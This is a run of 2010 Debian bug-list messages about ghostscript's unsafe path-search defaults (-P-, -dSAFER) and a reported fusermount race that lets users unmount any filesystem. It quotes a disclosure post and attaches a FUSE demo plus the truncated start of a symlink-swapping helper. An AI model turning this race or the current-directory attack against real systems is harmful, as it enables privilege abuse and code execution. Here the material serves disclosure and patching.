Dear Jonas, > ... I have backported it ... > deb http://debian.jones.dk/ squeeze printing I have now upgraded a machine to squeeze and tried your ghostscript 9.00~dfsg-1~0jones1 package, it works perfectly, thanks. Will this make it into squeeze? Seems not, being a backport. Should not this bug #584653 be left open (not "done"), as a reminder that squeeze is insecure? Or maybe, that is tracked in some way I am not aware of. Seems to me that in your package, the default is -P- (not -P). Should not this be mentioned in bug #584663 ? Could your package include the patch for bug #592569 also, to have -dSAFER as default? Thanks, Paul Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Bug#602333: /usr/bin/fusermount: fusermount allows unmount any filesystem
Dear Adam, > It would be more helpful if you checked, before filing grave bugs on > packages. I apologize for my laziness. I do not normally use fuse. Maybe I could set up a test machine, but (unless succeeded in the exploit) would not properly know whether Debian was safe. I thought it was better to warn now, than leave blissfully vulnerable. > This sounds very much like CVE-2009-3297, which has been fixed in > unstable, testing and stable since February (see DSA-1989-1). The page http://www.debian.org/security/2010/dsa-1989 refers to http://bugs.debian.org/567633 which says: a race condition if two fusermount -u instances are run in paralell so that does not seem to be the same issue. The page http://security-tracker.debian.org/tracker/DSA-1989-1 points to http://security-tracker.debian.org/tracker/CVE-2010-0789 which mentions "a symlink attack", which may be closer to this issue. I would expect DSA-1989 to have been adopted and fixed by Ubuntu, where the original poster says he found the issue. Cheers, Paul Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Bug#602333: /usr/bin/fusermount: fusermount allows unmount any filesystem
Package: fuse-utils
Version: 2.7.4-1.1+lenny1
Severity: grave
File: /usr/bin/fusermount
Tags: security
Justification: user security hole
As reported on a public mailing list, fusermount in Ubuntu allows
unprivileged users to unmount anything. I wonder if Debian is affected.
Relevant files attached below.
Cheers,
Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics University of SydneyAustralia
-- System Information:
Debian Release: 5.0.6
APT prefers stable
APT policy: (500, 'stable')
Architecture: i386 (i686)
Kernel: Linux 2.6.32-pk04.00-svr (SMP w/8 CPU cores)
Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)
Shell: /bin/sh linked to /bin/bash
Versions of packages fuse-utils depends on:
ii adduser 3.110add and remove users and groups
ii libc6 2.7-18lenny6 GNU C Library: Shared libraries
ii libfuse22.7.4-1.1+lenny1 Filesystem in USErspace library
ii makedev 2.3.1-88 creates device files in /dev
ii sed 4.1.5-6 The GNU sed stream editor
ii udev0.125-7+lenny3 /dev/ and hotplug management daemo
fuse-utils recommends no packages.
fuse-utils suggests no packages.
-- no debconf information
Title: [Full-disclosure] fusermount: Unmount any filesystem
[Full-disclosure] fusermount: Unmount any filesystem
halfdog
me at halfdog.net
Tue Nov 2 17:44:11 GMT 2010
Previous message: [Full-disclosure] [ANN] New version of w3af is available for download !
Next message: [Full-disclosure] [Onapsis Security Advisory 2010-008] Oracle Virtual Server Agent Arbitrary File Access
Messages sorted by:
[ date ]
[ thread ]
[ subject ]
[ author ]
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Hello List,
To evaluate the pros and cons of various disclosure methods, I'm trying
full disclosure this time:
At least on ubuntu lucid, the fusermount tool contains a timerace
mounting a user filesystem and updating mtab, thus mtab entries with
arbitrary path can be created. Crafted mtab entries can then be used to
unmount live parts of the filesystem.
http://www.halfdog.net/Security/FuseTimerace/
- --
http://www.halfdog.net/
PGP: 156A AE98 B91F 0114 FE88 2BD8 C459 9386 feed a bee
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.6 (GNU/Linux)
iD8DBQFM0E3rxFmThv7tq+4RAmavAJ9JNdwF6R0gv1FlIZ3to1QrkQs90wCgkUvA
IpD9Wfe/viLLIMLEfE1B2yo=
=tFrk
-END PGP SIGNATURE-
Previous message: [Full-disclosure] [ANN] New version of w3af is available for download !
Next message: [Full-disclosure] [Onapsis Security Advisory 2010-008] Oracle Virtual Server Agent Arbitrary File Access
Messages sorted by:
[ date ]
[ thread ]
[ subject ]
[ author ]
Full-Disclosure is hosted and sponsored by Secunia.
www.halfdog.net:Security:FuseTimerace:index.html
Description: XML document
/** Minimal userspace file system demo, compile using
* gcc -D_FILE_OFFSET_BITS=64 -lfuse -Wall FuseMinimal.c -o FuseMinimal
*
* Copyright (c) halfdog
*
* This software is provided by the copyright owner "as is" to
* study it but without any expressed or implied warranties, that
* this software is fit for any other purpose. If you try to compile
* or run it, you do it solely on your own risk and the copyright
* owner shall not be liable for any direct or indirect damage
* caused by this software.
*/
#define FUSE_USE_VERSION 26
#include
#include
#include
static int io_getattr(const char *path, struct stat *stbuf) {
int res=-1;
memset(stbuf, 0, sizeof(struct stat));
if (strcmp(path, "/") == 0) {
stbuf->st_mode=S_IFDIR|0755;
stbuf->st_nlink=2;
res=0;
}
return(res);
}
static int io_readdir(const char *path, void *buf, fuse_fill_dir_t filler,
off_t offset, struct fuse_file_info *fi) {
(void) offset;
(void) fi;
if(strcmp(path, "/")!=0) return -ENOENT;
filler(buf, ".", NULL, 0);
filler(buf, "..", NULL, 0);
return 0;
}
static struct fuse_operations hello_oper = {
.getattr = io_getattr,
.readdir = io_readdir,
};
int main(int argc, char *argv[]) {
return fuse_main(argc, argv, &hello_oper, NULL);
}
/** This program waits for notify of file/directory to replace
* given directory with symlink.
* Pa
Bug#584653: Debian NMU ghostscript
Dear Juli?n, > ... I think that bug 584663 is the same bug 584653 ... Sorry no, they are NOT the same bug. Bug 584653 is about things being wrong even if you explicitly use the option "-P-". Bug 584663 is about changing the default behaviour from the unsafe "-P" to the (hopefully working, secure) "-P-". (These bugs are related. I had tried to report them as the "one thing" bug 583183, but that did not get very far...) Cheers, Paul Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Bug#584663: ghostscript: insecure defaults for path searching
Dear Jonas, >>>>and that it will not be rudely and wrongly closed like #583183 ... > Please post such info to the actual bug where it is relevant. Cannot: bug is closed, archived. > Other people read the bugreports too. If you post your complaints ... > you may still help shift the agenda ... Thanks for understanding. Cheers, Paul Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Bug#584663: ghostscript: insecure defaults for path searching
Dear Jonas, >>and that it will not be rudely and wrongly closed like #583183 was in >>http://bugs.debian.org/cgi-bin/bugreport.cgi?msg=91;bug=583183 > > I disagree that the mass-filed bug was wrongly or rudely closed. Hmm... Maybe the closer could have had the courtesy to CC me (e.g. by CCing #583183, not mailing just to control): was stealthy, rude. Maybe the "mass filed bugs" had a reason to be closed, but not #583183 itself. Seems that #584066 was merged with #583183 as per http://bugs.debian.org/cgi-bin/bugreport.cgi?msg=9;bug=584066 (which is reasonable); then when #584066 was closed (as above), it closed #583183 instead: surely unintended, wrong. > ... I suggest you ask for elaboration ... Sadly, many of those people are not nice enough to respond. > ... or try read the nice documentation at > http://www.debian.org/Bugs/ which I believe covers e.g. mass-filing. I do try to keep up. (Not much time left after useless arguments...) Cheers, Paul Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Bug#584663: ghostscript: insecure defaults for path searching
Dear Jonas, >>> I think we should change the default to -dSAFER ... > I think the safest is to track it as a separate bug. Following your advice, I have now opened bug #592569 . Hoping I will not get abused for following such advice, as I got for http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=583183#42 and that it will not be rudely and wrongly closed like #583183 was in http://bugs.debian.org/cgi-bin/bugreport.cgi?msg=91;bug=583183 Cheers, Paul Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Bug#592569: ghostscript: Please make -dSAFER the default
Package: ghostscript Version: 8.62.dfsg.1-3.2lenny4 Severity: grave Tags: security Justification: user security hole Please make the -dSAFER option the default. For discussion, rationale etc please see bugs #583183 and #584663, and particularly: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=584663#55 Thanks, Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia -- System Information: Debian Release: 5.0.5 APT prefers stable APT policy: (500, 'stable') Architecture: i386 (i686) Kernel: Linux 2.6.26-pk03.18-svr (SMP w/8 CPU cores) Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968) Shell: /bin/sh linked to /bin/bash Versions of packages ghostscript depends on: ii debconf [debc 1.5.24 Debian configuration management sy ii debianutils 2.30 Miscellaneous utilities specific t ii defoma0.11.10-0.2Debian Font Manager -- automatic f ii gs-common 8.62.dfsg.1-3.2lenny4 Dummy package depending on ghostsc ii gsfonts 1:8.11+urwcyr1.0.7~pre44-3 Fonts for the Ghostscript interpre ii libc6 2.7-18lenny4 GNU C Library: Shared libraries ii libgs88.62.dfsg.1-3.2lenny4 The Ghostscript PostScript/PDF int Versions of packages ghostscript recommends: ii psfontmgr0.11.10-0.2 PostScript font manager -- part of Versions of packages ghostscript suggests: ii ghostscript-x 8.62.dfsg.1-3.2lenny4 The GPL Ghostscript PostScript/PDF pn hpijs (no description available) -- no debconf information -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Bug#584663: ghostscript: insecure defaults for path searching
Dear Moritz, > I think we should change the default to -dSAFER, but postpone it for > Squeeze+1. That is something which should be thoroughly tested in > unstable for a few months. Thanks. Will this now be taken care of, or should I open another "grave" bug against ghostscript? Thanks, Paul Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Bug#584653: ghostscript: does not honor -P- option
I wonder if this is now fixed upstream: http://bugs.ghostscript.com/show_bug.cgi?id=691350#c19 Cheers, Paul Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Bug#584663: ghostscript: insecure defaults for path searching
Seems this is now fixed upstream: http://bugs.ghostscript.com/show_bug.cgi?id=691350#c19 I wonder if that fixes http://bugs.debian.org/584653 also. --- Is this a good time to ask to make -dSAFER the default? (Or should that be -dPARANOIDSAFER, does that still exist?) --- I find it pleasing that upstream finally seems to have made -P- the default, after all the ugly shouting (now deleted) saying WONTFIX in http://bugs.ghostscript.com/show_bug.cgi?id=691316 http://bugs.ghostscript.com/show_bug.cgi?id=691339 --- Cheers, Paul Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Bug#584663: ghostscript: insecure defaults for path searching
>> Yes. All those who wish to call gs in unsafe ways, can (should!) >> explicitly use -P (and -NOSAFER). > You surely ment "-dNOSAFER", not "-NOSAFEE". Sorry, wrote that carelessly "from memory", without consulting the oh-so-useless Debian man page. Yes, I did mean -dNOSAFER. Cheers, Paul Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Bug#584663: ghostscript: insecure defaults for path searching
Dear Moritz, > I looked into this during DebConf: We could modify the default ... > but this would cause regressions ... Yes. All those who wish to call gs in unsafe ways, can (should!) explicitly use -P (and -NOSAFER). The alternative is to ensure all Debian packages explicitly use -P-, but that was "voted down" and branded "mass bug filing". We have a duty of care to the simple user, who innocently types gs myfile.ps or for whom such is run by his mail client or whatever. > I suppose implementing a filepath check as suggested by Werner Fink > is the best course of action. Do you mean http://bugs.ghostscript.com/show_bug.cgi?id=691350#c18 ? Is not that "search only in /usr/share/ghostscript" idea even more restrictive than -P- which excludes "." only? Cheers, Paul Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Bug#584667: Bug#583183: CVE-2010-2055
Seems that bug http://bugs.debian.org/583183 (which is now archived, un-changeable) or maybe one of the "derivatives" http://bugs.debian.org/584653 http://bugs.debian.org/584663 http://bugs.debian.org/584667 is being tracked as CVE-2010-2055. Another somewhat useful reference is https://bugzilla.redhat.com/show_bug.cgi?id=599564 Cheers, Paul Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Bug#583183: Scribus -dPARANOIDSAFER
Dear Oleksandr, > In Scribus we call gs with -dPARANOIDSAFER. Is that sufficient to > avoid this problem? Not sufficient, you need -P- also. I do not expect "upstream" ghostscript.com (artifex.com) to make -P- the default, I do not know if Debian will. (There are other bugs with gs, thus it is unsafe with all those options, but those are being worked on upstream and should make it into Debian, eventually.) Cheers, Paul (noting I am no gs expert, nor Debian maintainer) Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Bug#584022: page-crunch: Security bugs in ghostscript
Dear Sylvain, > OK, so as far as I understand, we'd better pass '-dSAFER -P-' to > 'ps2pdf' (which is AFAICS the only ghostscript script that's used in > page-crunch). My lenny /usr/bin/ps2pdf (really /usr/bin/ps2pdfwr) already includes -dSAFER. Yes you could (should?) pass -P- to it. I expect that to be fixed in the Debian ghostscript, sometime, anyway. Or, you could run ps2pdf in a "safe" directory, chdir to "/" or some empty directory, as cups and gv do (or will do): http://bugs.debian.org/584002 http://bugs.debian.org/583316 to also be protected against some as-yet-unpatched (but hopefully upcoming) gs bugs. Hope this helps... Cheers, Paul Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Bug#584015: ijsgutenprint: Security bugs in ghostscript
Dear Roger, >>> Have you considered a whole-archive search for e.g. -dSAFER in >>> the lintian lab? ... >> >> Sorry, do not know how to do that search. Can you explain? > > One of the Debian machines has the complete unpacked source trees for > every package in Debian on it, used for running Lintian. You could > simply run grep over the entire lot to identify all uses of -dSAFER in > the tree with or without -P-. > > If you're not a Debian developer, you won't have access, but you could > ask someone to run it for you and send you the results. I don't have > time to do this myself for you right now, but I'm sure you could ask > someone on -devel; if you don't have any luck I can possibly try at the > weekend. Thanks for the explanation, and the offer to help. I am not a developer. Sorry I do not think I will have time to follow this up, now, to that detail: am going on holidays, for four weeks starting this weekend, and will not have computer access during that time. If the issue is still outstanding in July then I will work on it again, and may ask for your help then. Cheers, Paul Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Bug#584001: courier-faxmail: Security bugs in ghostscript
Dear Racke, > What is the plan for the package in Debian stable? Sorry, I have no idea. I do not know if the fixed courier-faxmail will be included in stable (lenny). I guess that could only happen via a DSA, I do not recall any other type of improvements until the next "release". And I do not know if ghostscript will ever be fixed in any sense. Cheers, Paul Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Bug#584015: ijsgutenprint: Security bugs in ghostscript
Dear Roger, > ijsgutenprint is a ghostscript IJS server driver. It's invoked > /by/ ghostscript, so is not itself responsible for running > ghostscript. One potential source of vulnerabilities is > actually in glue scripts such as Foomatic, so I think probably > should be reassigned to foomatic-db-gutenprint. Note that > most/all of Foomatic and ancillary data packages such > as foomatic-db-gutenprint are packages you should probably > look at. Speaking to the printconf maintainer in http://bugs.debian.org/584026 he said that foomatic-filters is only affected. Maybe he knows, he is also the foomatic maintainer... > Have you considered a whole-archive search for e.g. -dSAFER in > the lintian lab? ... Sorry, do not know how to do that search. Can you explain? > ... If a program is using -dSAFER, it should also > be using -P- in all likelihood. It's probably better than > simply going off package dependencies. Responses to the various bugs show that no-one was aware of -P-, many still stubbornly say "I use -dSAFER thus am safe". I am not sure now if there was anyone without -dSAFER. Thanks, Paul Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Bug#583183: [Pkg-cups-devel] Bug#584003: cups-pdf: Security bugs in ghostscript
Dear Martin-Eric,
> ... We already call -dSAFER and drop privileges early, so we're
> already protected as it is. Closing.
Sorry, you seem to misunderstand: this bug is (more-or-less) about the
need to use the -P- also, as well as -dSAFER, to be protected.
Is cups-pdf "part of" cups? In that case you may be "safe" because of
chdir("/"), see http://bugs.debian.org/584002 .
Thanks, Paul
Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics University of SydneyAustralia
--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Bug#583995: advi-examples: Security bugs in ghostscript
Dear Mehdi, >>>>> On a side note, you should check ... > In case, it isn't obvious: I already read 583183 before closing and I > explained why advi-examples isn't open to such flaws. I see: that comment was not directed at me. Thanks, Paul Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Bug#583995: advi-examples: Security bugs in ghostscript
Dear Mehdi, >>> On a side note, you should check ... >> >> Thanks for that pointer. I guess you are right. But please see... > > No. Sorry, but I do not understand. Do you mean that you refuse to read, or that you disagree? Maybe you would care to explain, I would like to know your opinion. Cheers, Paul Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Bug#584013: hyperlatex: Security bugs in ghostscript
Dear Ronald, > I.e., you consider hyperlatex as "fixed" with regard to #584013 when > "-P- -dSAFER" are added to the gs calls? If you done that then I would not insist on keeping the bug open. Whether "fixed", only you can tell: sorry I do not use hyperlatex so cannot comment. (Please see the contortions that gv is going to to protect themselves in http://bugs.debian.org/583316 .) Cheers, Paul Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Bug#584052: kdelibs4c2a: Security bugs in ghostscript
Dear Sune, I agree with you. I suggested to gs that it should be secure-by-default, but they refused. Please do convince them... In the meantime, maybe you want to fix your use of that crappy gs. Cheers, Paul Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Bug#584001: courier-faxmail: Security bugs in ghostscript
Dear Racke, > ... I just wonder why this option isn't mentioned in the gs manpage. Good question. Maybe report as a bug to ghostscript? Cheers, Paul Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Bug#584062: sdf: Security bugs in ghostscript
Dear Colin, Your explanation shows you are not directly responsible (maybe not vulnerable at all), and can close the bug. Thanks for investigating, sorry about the "noise". Cheers, Paul Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Bug#584001: courier-faxmail: Security bugs in ghostscript
Dear Racke, > What kind of fixes do you have in mind? Please add the -P- option to all $GS invocations. Thanks, Paul Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Bug#584013: hyperlatex: Security bugs in ghostscript
Dear Roland,
> (1) If ghostscript has a bug, maybe it should be fixed there instead of
> in all gs dependant packages?
Yes, but gs says "cannot fix" and "please use -P-".
> (2) Mass bug filing (esp. RC/security) is generally not a great idea,
> especially if
> (3) You haven't checked the individual packages ("This package depends
> on ghostscript, and may be affected").
Sorry, I do my best but am only one.
> (4) Please state clearly what's wrong with the package (hyperlatex in
> this case). From the other bug reports I deduce that gs calls should be
> extended with "-P- -dSAFER". This should be done in the hyperlatex
> source package in bin/ps2image, for the record.
Yes, that probably should fix things. (Right now things are still unsafe
even with those options, but I expect gs to be able to fix the remaining
bugs.)
Thanks, Paul
Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics University of SydneyAustralia
--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Bug#584026: printconf: Security bugs in ghostscript
Dear Chris, I now see what tripped me up: in my Packages file, printconf depends on ghostscript, but foomatic-filters doesn't. Maybe that could be fixed? Thanks, Paul Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Bug#584061: recoll: Security bugs in ghostscript
Dear Giuseppe, > I'm slightly puzzled by your mass-bug filing. Why you opened bugs for > packages that suggest ghostscript...? I was not sure what relationship is implied by "suggest". It turns out that even "depends on" (or my parsing of the Packages file?) was not so good, I "hit" printconf instead of foomatic-filters apparently. But in essence, because I was asked to do so: please see http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=583183#42 and thereabouts. Cheers, Paul Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Bug#584026: printconf: Security bugs in ghostscript
reopen 584026 reassign 584026 foomatic-filters thanks Dear Chris, > ... doesn't apply to printconf. foomatic-filters is the only > Foomatic-related package that is affected by calling gs directly, > and I assume your mass-filed bug reports have hit that one too. Sorry, no. Seems my "pick out packages that depend on gs" did not find foomatic-filters, but it (wrongly?) found printconf. Also, I misunderstood you: thought that those foomatic things you spoke about were part of printconf. > If they haven't, you can reopen and reassign this one ... Doing so (attempting) now. > As for foomatic-filters itself: the only files specified on the > command line are /dev/fd/0 and /dev/fd/3, and gs is called with > -DPARANOIDSAFER (which appears to be equivalent to -DSAFER nowadays). > That would seem to narrow the vulnerability window, assuming only > files in /dev/fd could be accessed ... Sorry, you seem to mis-understand the bug. If the command is ever run in a writable directory say after "cd /tmp" then an attacker can cause to run code as the user running foomatic. Say, this is for printing: then surely users can send print files; if they have some control over the name, and foomatic runs in that directory, then it is doomed. Thanks for your help. Cheers, Paul Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Bug#584061: recoll: Security bugs in ghostscript
Dear Kartik, > I don't think this bug is correct for recoll. recoll only 'suggests' > ghostscript and don't use code from ghostscript. Filing bug at 'gs > package seems right. Thanks for the info. > CC'ng upstream to know more view. Also CC'ng security team if it is > valid to file a bug like this. Thanks, please let me know what you find. Please also see http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=583183#42 Cheers, Paul Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Bug#584064: texlive-base-bin: Security bugs in ghostscript
Dear Norbert, > That is right, but still it is a bug of ghostscript and should > be treated there, not anywhere else. Yes. And when they advise you to use -P- (and refuse to make that the default), you just need to follow: you need to change. (But yes, such a gs requirement, leaving it "insecure by default", is insane.) I note that right now, gs is unsafe even with -P-. > Furthermore, gs is not run with extended priviliges, so that > does not compromise the system unless the cups code is forwarding > that to gs. Only affects the users of cups: all user accounts are now compromised. I also guess that cups may be used for printing... I do not know whether that runs as root (compromising the whole machine) or as user "printer" (allowing attackers to "steal" sensitive printouts). Cheers, Paul Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Bug#584069: gimp: Security bugs in ghostscript
Dear Ari, Seems that you need to call gs with -P- also; and ensure any files (to read) passed as command-line arguments are "full pathnames". Pre-creating an empty directory and running gs there, as gv http://bugs.debian.org/583316 intends to do, might help. Cheers, Paul Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Bug#583183: /usr/bin/gs: Insecure gs initialization
>>Should some or all be alerted to the this security issue? So far gv and >>libspectre1 only have been alerted (bugs #583316 and #583634). > > Yes, please. Done, all mentioned packages alerted: http://bugs.debian.org/584039 a2ps http://bugs.debian.org/583994 advi http://bugs.debian.org/583995 advi-examples http://bugs.debian.org/584040 apsfilter http://bugs.debian.org/583996 asymptote http://bugs.debian.org/583997 bmv http://bugs.debian.org/583998 c2050 http://bugs.debian.org/584000 capisuite http://bugs.debian.org/584041 caspar http://bugs.debian.org/584042 cd-circleprint http://bugs.debian.org/584043 cedilla http://bugs.debian.org/584001 courier-faxmail http://bugs.debian.org/584002 cups http://bugs.debian.org/584003 cups-pdf http://bugs.debian.org/584044 dblatex http://bugs.debian.org/584045 derivations http://bugs.debian.org/584046 efax http://bugs.debian.org/584004 epix1 http://bugs.debian.org/584005 epstool http://bugs.debian.org/584006 fbi http://bugs.debian.org/584007 fig2ps http://bugs.debian.org/584008 flpsed http://bugs.debian.org/584069 gimp http://bugs.debian.org/584047 grace http://bugs.debian.org/584048 grace6 http://bugs.debian.org/583316 gv http://bugs.debian.org/584009 hevea http://bugs.debian.org/584010 hpijs http://bugs.debian.org/584049 hpoj http://bugs.debian.org/584011 hylafax-client http://bugs.debian.org/584012 hylafax-server http://bugs.debian.org/584013 hyperlatex http://bugs.debian.org/584014 ifhp http://bugs.debian.org/584015 ijsgutenprint http://bugs.debian.org/584050 impose+ http://bugs.debian.org/584052 kdelibs4c2a http://bugs.debian.org/584051 kdissert http://bugs.debian.org/584016 kghostview http://bugs.debian.org/584017 latex-make http://bugs.debian.org/584053 latex-mk http://bugs.debian.org/584054 latexmk http://bugs.debian.org/584018 libgs-dev http://bugs.debian.org/583634 libspectre http://bugs.debian.org/584019 logidee-tools 